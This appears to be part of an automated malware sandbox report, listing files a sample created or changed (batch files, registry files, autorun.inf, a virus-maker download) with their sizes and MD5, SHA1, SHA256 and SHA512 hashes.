SHA512a4ada455d44a89fd2baa505aa9266b70913967b839522ef5da8d7afd31af6662c3ad96ac3e3531d82a72be7d019c9d88f1ce391c5b5fa0e4422a634c51491165
-
C:\Users\Admin\Desktop\FIleList_xml.txtFilesize
217KB
MD514faabcc977d1c6577ad07e24b5d87cf
SHA1da72387ef02295b747426fb997d7a9e693a6bb4c
SHA256a5d8258cbfeaf06565f88ea4a1d05122a86f3c87429ce1891507e66c21f1a5d9
SHA512c616ad763f957095525a1b44d545382bcc5c908b6c34f3544e99a2b09eae3be84dae04a76ef74e4817b092a7ce81db2952e7cf1222e2d45fab8df18044a40f16
-
C:\Users\Admin\Desktop\adad.batFilesize
176B
MD5bbaad817427b2bef920c7d827d2f47f0
SHA1fb840c64b3deda8c299561d262fc3cddf2402972
SHA256165fcc6e740b0ba227a992920770d8c776e3beb7d083494c001faf49ddd79c92
SHA512b4296ad87eec7be8fa1bfbb7a20fc7d4851c43fbdcd1df3ca94cbd15145aca34f05dec0f7f4dabf47239793239402b75b91156bee192b0d1f3a0d3a2145f18a4
-
C:\Users\Admin\Desktop\dadadaadad.batFilesize
5KB
MD5aa0263b537d59c11108d5fda5df24234
SHA1404b9c6e89ff9690d4e27372417cb2e4e7cec628
SHA2564adde65272e293c0ac8eaa23f02e61296c8c8ca3653e31fa7e767425a0fa41e7
SHA5123e417dbb765824a32608ff7fea3f9918307073b173499490f9a0ce771dca0d795986a1f2b1a38a79be4a6b97604e1433911d9dbae40a85b5b10f1b30f6a6aa6e
-
C:\Users\Admin\Desktop\dadadaadad.batFilesize
5KB
MD57bdf0565c74c57c576078c145ef518e8
SHA199a2717990512fd1dd03e5ed7204da417d329391
SHA2564aef3ea110602dffc9dc9b05ca1845cd37557e7221571580e262f5c2edc8289d
SHA512842f9c8dfe0f2fb49af9abf88330d89628e9c14c8616e1ea84e70d06962364b2d59f026a12d543df1ab7c8ecde20ad00f51b4dda7202b40431dc9a746c766de3
-
C:\Users\Admin\Desktop\nokeyboard.regFilesize
576B
MD553ffa92a2a3cdcbd3fb0e3ecf0a9dd80
SHA1eb2a145817caa9cf2bebb8b0d8e8d76a66f168e5
SHA2569a8e8d373b872678f65a7e2ff1e395328ce9fb97e079c2d0e9a4ec692458e489
SHA512a5d1ad458f58ba4cd214b51183b3a0244e393c393204c752b62b15acb037ced703b4a427cc3b0ef756f3d13cb26bd760578ff61dffcd266ff517aae8b1597f5f
-
C:\Users\Admin\Desktop\nokeyboard.regFilesize
1KB
MD5fa5412123f5ef3f83c2bd8b8c23fdf4d
SHA15d2a7c634ac64fe9a40fbc217d25178f77c118a9
SHA256a029ae77eced03e515a2acb0ee8ebecf3aebea402e441beef1615e3488234f8e
SHA512bdc6d8201b1a334bfd3f204cf4e633f02d024ac693dcb5816f604a885c23f33c1db03dd07378f13d08fa4255fbd642782142a6f7f7f1647b3c26a2c7cd544d54
-
C:\Users\Admin\Desktop\wadawda.batFilesize
472B
MD5fc671f127970c600804004319b508567
SHA12939432340ce812dea14e9f7588997c8d12eaca1
SHA256ff08ddfce642ca4e72d38d8ce76b1313e2c4afedf758856a90536b8cfabfd806
SHA5128f5b2e5897d127f539f7f0061d41f27b72212995a81feda2d650d51d765c4f7edbb3113c4fe65650c547db57e00d1d23ccd13819cd760a5a46980d6d4ef6b738
-
C:\Users\Admin\Desktop\wannadie.batFilesize
2KB
MD58f9f12ef5f32084e8b7f17f14eab1d69
SHA1b3a276699fb511b10ab7889e3477ad1b45ed2300
SHA256e7b56df9f0f0256ea463c004d9a1b4460d43b3c82035cdbbcdf84c8784519721
SHA512dce5dd518553f846419c59b274d7b227577920371686dd4408a289f5e4f5c245bf1e482723a0d6d35643a479dd25a6279392b02e4a619c3214a7930191fcba62
-
C:\Users\Admin\Desktop\wannadie.batFilesize
7KB
MD56b91e7ced0fb5373b08704f76bc4dc85
SHA1db313029c41b18aa20f137eb1952ef3636a88bd0
SHA25626255e7df58dfc3cb73124c28fb43219cb8731b7c7760de8e73ef7d003989957
SHA512a912853bb601dae7067ce50a4fc5c517072538dcd3b6ed5d7446004d8191251d84da784238a28a4fc882f29f2af7b0901171551ff27bc07017879e74bd16c255
-
C:\Users\Admin\Downloads\Bhavesh Virus Maker v1.0.0.1.zip:Zone.IdentifierFilesize
26B
MD5fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98
-
C:\Users\Admin\Downloads\Unconfirmed 554281.crdownloadFilesize
3.4MB
MD5fc611459d76232259ac3fd1f3456d60a
SHA13407a2b1b913239e8b70786160b6584a1577d151
SHA2565bb924807d43e98d404a520d35446eca67ada7a30218360bd6325e10deb9c309
SHA512a430e5d4c7d61f62ed362ef1bdb87d68610d4d11b718a0208fb73f6270471b255bf3465955b0ec9a9ed8a766b38872d5b33187b87d0223d3694ea6fb577edf12
-
C:\autorun.infFilesize
98B
MD5c6dcf29bf2f2bd6b3afc8fa325da8d3a
SHA1cb97a804a71843ef85dee8ff58949805e7dcf036
SHA2565cfedefb0a3cde24469a2ffbb534b773eb18b537a03a4b9e0e2d1b55ccb867cc
SHA512ab8a199f14e5cdcfeaddcba7c6ca7e9bfd155dccf46eb85de253353498d776e48731fb6c4045de55c832a79430df2844821443e8e654db699556aa2a5b6dd60c
-
F:\autorun.infFilesize
61B
MD500de926f8029b30a0e2c80d856ed4ee9
SHA19bd8b6d6888e0071b5a63684d4a31be04120c49c
SHA2568f857d774d9ae8d69355be32ff3b5c5e0985e7c6ef3a22bf2bd1ae33be4d0d60
SHA5126dc2e95e6e6971c663053be5dcf5948bb206a7b07638439187f6c44d0d5ac4bdb6fafe22a33e178bf5c978a9d43a252571b1294afbbe5e3fd1608f93204b1d56
-
\??\pipe\LOCAL\crashpad_1196_UNXRJIDNDDSOZQERMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/4320-501-0x00000000007F0000-0x00000000008AA000-memory.dmpFilesize
744KB